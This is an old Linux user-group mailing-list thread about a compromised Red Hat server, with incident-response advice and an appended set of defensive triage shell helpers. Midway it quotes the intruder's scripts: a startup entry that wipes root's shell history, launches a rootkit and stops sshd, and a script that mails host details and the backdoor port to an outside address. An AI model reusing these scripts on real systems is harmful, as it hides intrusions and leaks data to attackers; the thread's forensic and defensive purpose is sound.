[lug] i got hacked

D. Stimits stimits at idcomm.com
Thu Apr 18 15:59:45 MDT 2002


Searching Google for linux plus trimite, there are an amazing number of
non-English links to the .ro domain.

j davis wrote:
> 
> I have a box at a place I do contract work about 2 days a month.
> Today I could not ssh to it, so I went on site and discovered I got
> hacked... like a dummy I didn't have TCP wrappers on or a firewall. I think
> they exploited wu-ftpd... I use Red Hat 7.1 with wu-ftpd 2.6.1-20... I haven't
> gotten around to upgrading yet.

An old sshd is vulnerable, and so is wu-ftpd (very vulnerable). A big
difference in how it is approached would depend on whether those ports
need to be open to the whole world or not, or whether perhaps only a
limited number of public domains need to be open. I see port scans all
day that are attempting one intrusion or another; DNS on port 53 and lpd
exploits on 515 are the other major sources of exploits. So if you have
BIND running, or an old lpd which is open to the world, those are also
high on the list.

> anyway here is what i found in /etc/rc3.d/S52remote
> 
> #!/bin/sh
> 
> rm -rf /root/.bash_history
> ln -s /dev/null /root/.bash_history
> 
> cd /dev
> ./ryz -f ./s
> /etc/rc.d/init.d/sshd stop
> cd /
> 
> /usr/bin/trimite
> 
> then here is /usr/bin/trimite
> 
> #!/bin/sh
> 
> echo "* Info : $(uname -a)" >> /tmp/info
> echo "* Hostname : $(hostname -f)" >> /tmp/info
> echo "* IfConfig : $(/sbin/ifconfig | grep inet)" >> /tmp/info
> echo "* Uptime : $(uptime)" >> /tmp/info
> echo "* Cpu Vendor ID : $(cat /proc/cpuinfo|grep vendor_id)" >> /tmp/info
> echo "* Cpu Model : $(cat /proc/cpuinfo|grep model)" >> /tmp/info
> echo "* Cpu Speed: $(cat /proc/cpuinfo|grep MHz)" >> /tmp/info
> echo "* Bogomips: $(cat /proc/cpuinfo|grep bogomips)" >> /tmp/info
> echo "* Spatiu Liber: $(df -h)" >> /tmp/info   # Romanian: "Spatiu Liber" = "Free space"

Interesting, non-English like most of the web search URLs. I know .ru
is Russia; anyone know what domain .ro is?

> echo "* Ping la Yahoo: $(ping -c3 yahoo.com)" >> /tmp/info   # Romanian: "Ping la Yahoo" = "Ping to Yahoo"
> echo "* Password: $(wc /etc/passwd -l)" >> /tmp/info
> echo "* Portul rootkitului este 25897" >> /tmp/info   # Romanian: "The rootkit's port is 25897"

I am guessing this is the port used for backdoors, being sent to
yahoo.com.

> cat /tmp/info | mail -s "root dupa reboot" ryz_ro at yahoo.com   # Romanian subject: "root after reboot"

VERY VERY IMPORTANT: Send this to both abuse at yahoo.com and the FBI. You
probably can't prosecute, but it should be added to their database and
knowledge. Yahoo.com should be told very explicitly to keep log
information concerning that account in case authorities wish to see it;
a crime has been committed.

> rm -f /tmp/info
> 
> So, netstat says I have something listening on 25897... what should I do?!
> Never been hacked before... I already turned off ftp and turned on TCP
> wrappers.

If it installed a stealth module you will not see it, nor will you if
netstat and the other net programs themselves were altered (very common).
Probably measures like TCP wrappers had a modified version put in. You
could, if the system is rpm based or you otherwise have MD5 checksums of
files, use a rescue CD (which means MD5, rpm, or other check utilities
are not modified in secret) and search for an idea of what was altered,
to aid in your next setup protecting against this again (very advisable).
But in the end, you probably need to save data, e.g., home directories,
and wipe the drive and reinstall from scratch, being certain to firewall
where possible (both incoming and outgoing; e.g., if you got cracked via
lpd on port 515, and nobody needs to print via a remote host somewhere
else, you can assume that a cracked box would result in your box becoming
an attacker of other port 515 boxes, so denying outbound targets to port
515 would block use of your machine to crack others). Oh, also make sure
linuxconf (see /etc/services) is blocked and/or disabled for network
based access.

If in doubt, you can ask about things you find suspicious for more
specific advice.

D. Stimits, stimits at idcomm.com

> 
> help please
> jd
> 
> 
> _______________________________________________
> Web Page:  http://lug.boulder.co.us
> Mailing List: http://lists.lug.boulder.co.us/mailman/listinfo/lug
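An added example, not code from the original thread or from either poster: a few sh/awk triage helpers for the situation described above. They read listeners straight from a /proc/net/tcp-format table (so a trojaned netstat is bypassed, though a kernel stealth module is not), look for rc?.d start entries that are regular files rather than the symlinks into ../init.d that Red Hat installs (the S52remote above is exactly that), and check whether a home directory's .bash_history has been pointed at /dev/null. It assumes sh, awk and coreutils are run from rescue media, takes every path as a parameter so it can work on a copied table or a mounted disk, and the sample /proc/net/tcp table and rc directory at the bottom are constructed for the demo, not captured from the compromised host; the port 25897 (hex 6529) is the one named in the trimite script.

```shell
#!/bin/sh
# Added example, not from the original thread. Triage helpers meant to be
# run with sh, awk and coreutils copied from rescue media rather than the
# possibly trojaned binaries on the compromised host. Every path is a
# parameter so the checks also work on a copied table or a mounted disk.

# Decimal port numbers of TCP sockets in LISTEN state (st == 0A), read
# straight from a /proc/net/tcp-format table instead of through netstat.
# Column 2 is local_address as HEXIP:HEXPORT; the shell's printf converts
# the hex port (dash and bash both accept the 0x prefix).
listening_ports() {
    awk 'NR > 1 && $4 == "0A" { split($2, a, ":"); print a[2] }' "$1" |
    while read -r hex; do printf '%d\n' "0x$hex"; done | sort -n | uniq
}

# Listening ports that are not in the caller's allow list (remaining args).
# Usage: unexpected_listeners /proc/net/tcp 22 25
unexpected_listeners() {
    file=$1
    shift
    for p in $(listening_ports "$file"); do
        ok=0
        for a in "$@"; do
            if [ "$p" = "$a" ]; then ok=1; fi
        done
        if [ "$ok" = 0 ]; then echo "$p"; fi
    done
}

# Red Hat installs rc?.d start entries as symlinks into ../init.d; the
# S52remote above was dropped in as a regular file. Print S* entries in
# the given directory that are not symlinks.
suspicious_rc_entries() {
    for f in "$1"/S*; do
        if [ -e "$f" ] || [ -L "$f" ]; then
            if [ ! -L "$f" ]; then echo "$f"; fi
        fi
    done
}

# True when a home directory's .bash_history has been replaced by a
# symlink to /dev/null, as the S52remote script above does for /root.
history_nulled() {
    [ -L "$1/.bash_history" ] && [ "$(readlink "$1/.bash_history")" = /dev/null ]
}

# --- Constructed sample data (not captured from the compromised host) ---

# A /proc/net/tcp-style table: sshd listening on 22 (0x0016), the rootkit
# port 25897 (0x6529) listening, and one established session (st 01).
write_sample_tcp() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1234 1 00000000 100 0 0 10 0
   1: 00000000:6529 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1235 1 00000000 100 0 0 10 0
   2: 0A000002:0016 0A000001:C3A1 01 00000000:00000000 00:00000000 00000000     0        0 1236 1 00000000 100 0 0 10 0
EOF
    echo "$f"
}

# A fake rc3.d with one normal symlink entry and one dropped-in regular
# file, plus a nulled .bash_history in the same directory.
make_sample_rcdir() {
    d=$(mktemp -d)
    ln -s ../init.d/sshd "$d/S55sshd"
    printf '#!/bin/sh\n/usr/bin/trimite\n' > "$d/S52remote"
    ln -s /dev/null "$d/.bash_history"
    echo "$d"
}

# Demo run against the constructed samples.
sample_tcp=$(write_sample_tcp)
sample_dir=$(make_sample_rcdir)
echo "Listening: $(echo $(listening_ports "$sample_tcp"))"
echo "Unexpected (allowing 22 and 25): $(echo $(unexpected_listeners "$sample_tcp" 22 25))"
echo "Non-symlink start entries: $(suspicious_rc_entries "$sample_dir")"
if history_nulled "$sample_dir"; then echo "$sample_dir/.bash_history -> /dev/null"; fi
rm -rf "$sample_tcp" "$sample_dir"
```

On a live box the table is /proc/net/tcp (and /proc/net/tcp6); on a disk mounted from a rescue CD only the rc directory and home directory checks apply, since socket state is not on disk. Anything these helpers flag is a lead for the rpm or MD5 comparison, not proof, and none of it replaces the wipe-and-reinstall advised above.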
